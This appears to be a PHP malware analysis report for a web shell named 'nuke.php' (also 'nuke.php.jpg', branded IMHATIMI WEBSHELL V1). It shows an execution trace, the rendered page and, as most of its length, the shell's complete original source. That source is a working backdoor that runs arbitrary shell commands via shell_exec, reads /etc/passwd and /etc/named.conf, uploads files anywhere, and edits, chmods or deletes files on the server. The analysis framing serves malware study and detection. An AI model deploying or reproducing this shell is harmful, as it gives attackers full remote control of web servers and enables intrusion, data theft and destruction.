2		A						/var/www/html/uploads/nuke.php	409	$info .= 'r'
2		A						/var/www/html/uploads/nuke.php	410	$info .= '-'
2		A						/var/www/html/uploads/nuke.php	413	$info .= 'x'
2	48	1	0.002785	468560
2	48	R			'-rwxr-xr-x'
2	50	0	0.002799	468520	is_writable	0		/var/www/html/uploads/nuke.php	342	1	'/var/www/html/uploads/prepend.php'
2	50	1	0.002815	468560
2	50	R			FALSE
2	51	0	0.002828	468520	is_readable	0		/var/www/html/uploads/nuke.php	342	1	'/var/www/html/uploads/prepend.php'
2	51	1	0.002842	468560
2	51	R			TRUE
2	52	0	0.002856	468456	php_uname	0		/var/www/html/uploads/nuke.php	419	0
2	52	1	0.002869	468568
2	52	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	53	0	0.002888	468456	phpversion	0		/var/www/html/uploads/nuke.php	420	0
2	53	1	0.002903	468520
2	53	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
1	3	1	0.002921	468456
			0.002952	326224
TRACE END   [2023-02-13 02:29:56.099000]

Generated HTML code
<html><head></head><body><h2>IMHATIMI WEBSHELL V1</h2>
<a>OS :  </a>
<a id="ip">UNAME : localhost 
</a><br>
<a href="http://::1">İP : ::1</a>
<a href="http://::1" id="ip">SERVER İP : ::1</a>
<hr>
<style>
#ip{
    margin-left:50px;
}
</style>
<form action="nuke.php" method="get">
<center>
<button href="nuke.php" class="button">Home</button>
<input type="submit" value="Terminal" class="button" name="slc">
<input type="submit" value="PHP INFO" class="button" name="slc">
<input type="submit" value="Upload" class="button" name="slc">
<input type="submit" value="Get Config" class="button" name="slc">
<input type="submit" value="Domains" class="button" name="slc">
<input type="submit" value="About" class="button" name="slc">
</center>
</form>


<br><br><center><a href="http://imhatimi.org">imhatimi.org</a></center>


<link href="" rel="stylesheet" type="text/css">

<title>NUKE SHELL</title>

<style>
*{
    color: red;
}
body{
font-family: "Racing Sans One", cursive;
background-color: black;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: silver;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: red;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #FF00FF;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>



<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr><td>Su an Burdasin Dostum : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST"><font color="green">
Dosya Yukle<input type="file" name="file">
<input type="submit" value="Yukle">

</font></form></td></tr></tbody></table><br><center></center><div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<td><center>İsim</center></td>
<td><center>Boyut</center></td>
<td><center>Yetkiler</center></td>
<td><center>Seçenekler</center></td>
</tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
<td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td><center><form method="POST" action="?option&amp;path=/var/www/html">
<select name="opt">
<option value=""></option>
<option value="delete">Sil</option>
<option value="chmod">Chmod</option>
<option value="rename">Yeniden Adlandir</option>
<option value="edit">Duzenle</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value=">">
</form></center></td>
</tr><tr>
<td><a href="?filesrc=/var/www/html/nuke.php.jpg&amp;path=/var/www/html">nuke.php.jpg</a></td>
<td><center>13.862 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td><center><form method="POST" action="?option&amp;path=/var/www/html">
<select name="opt">
<option value=""></option>
<option value="delete">Sil</option>
<option value="chmod">Chmod</option>
<option value="rename">Yeniden Adlandir</option>
<option value="edit">Duzenle</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="nuke.php.jpg">
<input type="hidden" name="path" value="/var/www/html/nuke.php.jpg">
<input type="submit" value=">">
</form></center></td>
</tr></tbody></table>
</div><br>

<center><h3>Bilgi</h3>OS : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64Linux<br>PHP Versiyon : 7.2.34-37+ubuntu22.04.1+deb.sury.org+1</center>
<style>
    *{
        background-color:black;
        color:red;
        border-color: white;
    }
    body{
        background:black;

    }
    hr{
        width: 1350px;
    }
    .button{

    background-color: red;

    border: none;

    color: white;

    padding: 15px 32px;

    text-align: center;

    text-decoration: none;

    display: inline-block;

    font-size: 16px;

    margin: 4px 2px;

    cursor: pointer;
}

</style></body></html>
Original PHP code
<h2>IMHATIMI WEBSHELL V1</h2>
<a>OS : <?php php_uname()  ; ?> </a>
<a id="ip">UNAME : <?php echo $dizin = $_SERVER["SERVER_NAME"]; ?> 
</a><br>
<a href="http://<?php echo $dizin = $_SERVER["REMOTE_ADDR"]; ?>">İP : <?php echo $dizin = $_SERVER["REMOTE_ADDR"]; ?></a>
<a href="http://<?php echo $dizin = $_SERVER["SERVER_ADDR"]; ?>" id="ip">SERVER İP : <?php echo $dizin = $_SERVER["SERVER_ADDR"]; ?></a>
<hr>
<style>
#ip{
    margin-left:50px;
}
</style>
<form action="nuke.php" method="get" >
<center>
<button href="nuke.php" class="button">Home</button>
<input type="submit" value="Terminal" class="button" name="slc">
<input type="submit" value="PHP INFO" class="button" name="slc">
<input type="submit" value="Upload" class="button" name="slc">
<input type="submit" value="Get Config" class="button" name="slc">
<input type="submit" value="Domains" class="button" name="slc">
<input type="submit" value="About" class="button" name="slc">
</center>
</form>


<?php
if(isset($_GET['slc'])){
    if($_GET['slc'] == "PHP INFO"){
        phpinfo();
    }elseif($_GET['slc'] == "Upload"){?>
        <?php
        
        if(isset($_FILES['file'])){
            $file = $_FILES['file'];
            $file_name = $file['name'];
            $file_tmp = $file['tmp_name'];
            $file_size = $file['size'];
            $file_error = $file['error'];
            $file_ext = explode('.' ,$file_name);
            $file_ext = strtolower(end($file_ext));
            $allowed =array('txt','php','html','jpeg','jpg','png','mp3','mp4','avi','css');
            if(in_array($file_ext,$allowed)){
                if($file_error == 0){
                if($file_size <= 2097152){
                $file_name_new = uniqid('', true) . '.' . $file_ext;
                $file_dest = '' . $file_name_new;
                if(move_uploaded_file($file_tmp, $file_dest)){
                echo "Yuklendi : ",$file_dest ;            
        }
        }
        }
        }
    }else{
    echo "<script>console.info('dosya yuklenmedi');</script>";}?>
    <center>
    <form action="nuke.php?slc=Upload " method="post" enctype="multipart/form-data">
    <h3>Dosya Yukle</h3>
    <input type="file" name="file" >
    <input type="submit" value="upload">
    </form>
</center>
    <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
    <?php }
    elseif($_GET['slc'] == "Get Config"){
        if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
            echo '<center> cant read /etc/passwd content </center>';
        } else {
            $passwd = fopen('/etc/passwd','r');
            echo fgets($passwd); 
            fclose($passwd);        }
        ?>
           <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
        <?php 

        
    }elseif($_GET['slc'] == "Domains"){
        if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
            echo '<center>  i cant read /etc/named.conf  </center>';
        } else {
            $dosya = fopen('/etc/named.conf','r');
            echo fgets($dosya); 
            fclose($dosya);


        }
?>
   <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
     <?php   
    }elseif ($_GET['slc'] == "Terminal") { ?>
        <center><br><br>    
        <form action="nuke.php?slc=Terminal" method="POST">
        <label for="sh">Komut Calistir : </label>
        <input type="text" name="sh" placeholder="terminal">
        <input type="submit">
        </from>
    </center>
        <?php 
        if(isset($_POST['sh'])){
            $sh = $_POST['sh'];
            $bash = shell_exec($sh);
            echo "<hr>";
            echo "<pre><br>",$bash,"<pre>";
        } ?>
              <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
    <?php 
    }elseif($_GET['slc'] == "About"){
          echo '<br><br><br><center><img src="https://imhatimi.org/forum/data/assets/logo/imtlogo3gf.gif.pagespeed.ce.sySeUzvzis.gif"><center>' ;
        echo '<br><br><center><font color="red" size="20">THIS SHELL CODED BY NUKE FOR <a href="http://imhatimi.org">IMHATIMI</a></center>';
        ?>
           <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
           <?php 
    }else{
        echo "hata 404";
    }
}else{
   
echo '<br><br><center><a href="http://imhatimi.org">imhatimi.org</a></center>';

} ?>
<?php
set_time_limit(0);
error_reporting(0);

if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">

<title>NUKE SHELL</title>

<style>
*{
    color: red;
}
body{
font-family: "Racing Sans One", cursive;
background-color: black;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: silver;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: red;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #FF00FF;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>

<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Su an Burdasin Dostum : ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<font color="#green">Basarili</font><br />';
}else{
echo '<font color="#red">Hata</font><br />';
}
}
echo '<form enctype="multipart/form-data" method="POST"><font color="green">
Dosya Yukle<input type="file" name="file" />
<input type="submit" value="Yukle" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
echo "<tr><td>Su anki Dosya : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="green">Yetkiler Guncellendi Kankaa</font><br />';
}else{
echo '<font color="red">Yetkiler Guncellenemedi</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Yukle" />
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="green">Ad Degistirildiki</font><br />';
}else{
    echo '<font color="red">Basaramadik Abi</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Yukle" />
</form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="green">Dosya Duzenlendi Yine İyisin</font><br />';
}else{
echo '<font color="red">Aga Olmadi</font><br />';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Yukle" />
</form>';
}
echo '</center>';
}else{
echo '</table><br /><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="green">Yok Edildi</font><br />';
}else{
echo '<font color="red">Silinmiyo AMK</font><br />';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="green">Silindi</font><br />';
}else{
echo '<font color="red">Silinmiyo Amk</font><br />';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>İsim</center></td>
<td><center>Boyut</center></td>
<td><center>Yetkiler</center></td>
<td><center>Seçenekler</center></td>
</tr>';

foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="#00BFFF">';
elseif(!is_readable("$path/$dir")) echo '<font color="#FFE4E1">';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Sil</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Yeniden Adlandir</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
$size = filesize("$path/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}

echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="#FF00FF">';
elseif(!is_readable("$path/$file")) echo '<font color="FFE4E1">';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Sil</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Yeniden Adlandir</option>
<option value=\"edit\">Duzenle</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo '</table>
</div>';
}
echo '<br />
</BODY>
</HTML>';
function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}

echo "<center><h3>Bilgi</h3>";
echo "OS : " , php_uname() , PHP_OS;
echo "<br>PHP Versiyon : " , phpversion() ;
echo "</center>";

?>

<style>
    *{
        background-color:black;
        color:red;
        border-color: white;
    }
    body{
        background:black;

    }
    hr{
        width: 1350px;
    }
    .button{

    background-color: red;

    border: none;

    color: white;

    padding: 15px 32px;

    text-align: center;

    text-decoration: none;

    display: inline-block;

    font-size: 16px;

    margin: 4px 2px;

    cursor: pointer;
}

</style>
PHP Malware Analysis

nuke.php, nuke.php.jpg

md5: 769abecc544ffed38f1d86805250f1a9

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
